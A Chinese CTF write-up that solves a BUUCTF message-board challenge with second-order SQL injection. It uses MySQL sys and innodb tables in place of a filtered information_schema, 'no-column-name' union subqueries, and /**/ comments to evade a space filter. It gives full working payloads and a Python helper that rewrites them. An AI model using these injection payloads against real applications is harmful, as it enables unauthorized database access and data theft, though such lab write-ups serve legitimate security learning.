文章目录

  • 前言
  • 前置知识
  • 解题过程
  • 总结



前言

其实这道题昨天就做到了,昨天不会做只能去看大佬题解,一开始自己尝试了一会以为是xss,结果看大佬博客发现是mysql的无列名注入,也是经典的留言板二次注入,o(╥﹏╥)o又学习到了新知识点,今天再来复现一遍!(好像BUU复现的题目查询到表名只有一种方法了,比赛时好像有多种)


前置知识

在一开始学习sql注入时,都知道information_schema这个数据库很重要,可以查询到所有的表名和列名,但是当information_schema被过滤时,我们就得另想办法了,就需要用到著名的无列名注入,当然还有其他小知识点。

可以用到无列名注入的前提是需要知道flag所在的表名!!!

MySQL5.7的新特性:sys.schema_auto_increment_columns,sys.schema_table_statistics_with_buffer
由于performance_schema过于发杂,所以mysql在5.7版本中新增了sys schemma,基础数据来自于performance_chema和information_schema两个库,本身数据库不存储数据。

mysql默认是关闭InnoDB存储引擎的:mysql.innodb_table_index和mysql.innodb_table_stats

搬运的图片:

mysql 更新 数据库列 为其他两列相加_mysql


还有第三种:

这个可以一路爆到底,不过前提是需要有users这个表才行

搬运图:

mysql 更新 数据库列 为其他两列相加_mysql_02


所以我们可以通过以上三个特性去爆出我们需要的表名

无列名注入:

使用条件&方法 无列名注入主要是适用于已经获取到数据表,但无法查询列的情况下,在大多数 CTF 题目中,information_schema
库被过滤,使用这种方法获取列名。
无列名注入的原理其实很简单,类似于将我们不知道的列名进行取别名操作,在取别名的同时进行数据查询,所以,如果我们查询的字段多于数据表中列的时候,就会出现报错。

假设在security这个数据库下查询,已经知道了emails这个库

一般可以直接select *,但如果限制了只能一列的话
正常通过information_schema查询字段值的语句:
先通过select column_name from information_schema.columns where table_name=“xxx”
查到具体的column_name时,在select xxx from “xxx”

mysql 更新 数据库列 为其他两列相加_表名_03

无列名:

如果查询语句为:
select 1,2 union select * from emails;
当进行联合查询时,如果不存在这个数据,就会构造虚拟数据插入表中。(不知道这个知识点对不对×)
同时我们可以看到列名也被改变了,这就给我们成功制造了bypass的方式。

mysql 更新 数据库列 为其他两列相加_表名_04


继续构造语句:
select `2` from (select 1,2 union select * from emails)a
前面的`2`一定记得要使用反引号`,代表的意思是查询第二列的所有字段值
最后面的a可以是任意值,用来命名的

mysql 更新 数据库列 为其他两列相加_表名_05

当过滤反引号时,还可以使用as别名来bypass:
select `b` from (select 1 as a,2 as b union select * from emails)abc

mysql 更新 数据库列 为其他两列相加_mysql_06


解题过程

进入网站,先注册,注册完进行登录,可以看到可以发布广告,我竟然测试了好一会,发现可以使用xss,以为是通过xss来获取flag,终究还是姿势不够,还需要学习很多很多。。。
这是经典的留言板二次注入啊!!!

首先通过留言:1‘
回显看到报错了,第一反应肯定是报错注入啦!

mysql 更新 数据库列 为其他两列相加_mysql_07


但是通过尝试发现,过滤一些字符向空格,and,or,#等直接导致information_schema不能使用,这时就需要用到前面所讲的无列名注入了,我们需要先把需要用到的表名爆出

ps:空格被过滤了,可以使用/**/来绕过,同时为了防止重复劳动,可以写个脚本把空格替换成/**/

代码如下:

str='''1 1 1 1
-1\' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,\'22
-1\' union select 1,database(),version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,\'22
-1\' union select 1,(select table_name from sys.schema_auto_increment_columns),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,\'22
-1\' union select 1,(select group_concat(table_name) from mysql.innodb_table_stats),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,\'22
-1\' union select 1,(select group_concat(`1`) from(select 1,2 union select * from FLAG_TABLE)a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,\'22
-1\' union select 1,(select group_concat(`1`) from(select 1,2 union select * from users)a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,\'22
-1\' union select 1,(select group_concat(`3`) from(select 1,2,3 union select * from users)a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,\'22
-1\' union select 1,(select * from users),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,\'22
'''
res=str.replace(" ","/**/")
print(res)

第一步先测试所查询的库一共有几列数据,看到23时就报错了,那就是22了:

1’/**/group/**/by/**/23,'1

mysql 更新 数据库列 为其他两列相加_数据库_08


然后查看回显位置,在2,3号位:

-1’/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22

mysql 更新 数据库列 为其他两列相加_mysql_09


测试查看一下版本号和数据库:

-1’/**/union/**/select/**/1,database(),version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22

mysql 更新 数据库列 为其他两列相加_sql_10


开始真正的爆破:

一番测试,BUU这个复现的题目仅支持mysql.innodb_table_stats来爆表名

-1’/**/union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22

mysql 更新 数据库列 为其他两列相加_sql_11


测试的时候发现FALG_TABLE是个假的,可恶,最终尝试到了users就出现flag字样,在users表中还要尝试一番它的列有几列,尝试到了三列就对了,并且flag就在第三列的某组数据中,拿到flag:

-1’/**/union/**/select/**/1,(select/**/group_concat(`3`)/**/from(select/**/1,2,3/**/union/**/select/**/*/**/from/**/users)a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22

mysql 更新 数据库列 为其他两列相加_表名_12


总结

一直觉得自己sql注入学的还挺浅的,只会一些死套路,唉。这道题让我学到老无列名注入和一些小姿势,又变强了一点点啊,不过,还有好多要学啊o(╥﹏╥)o。。。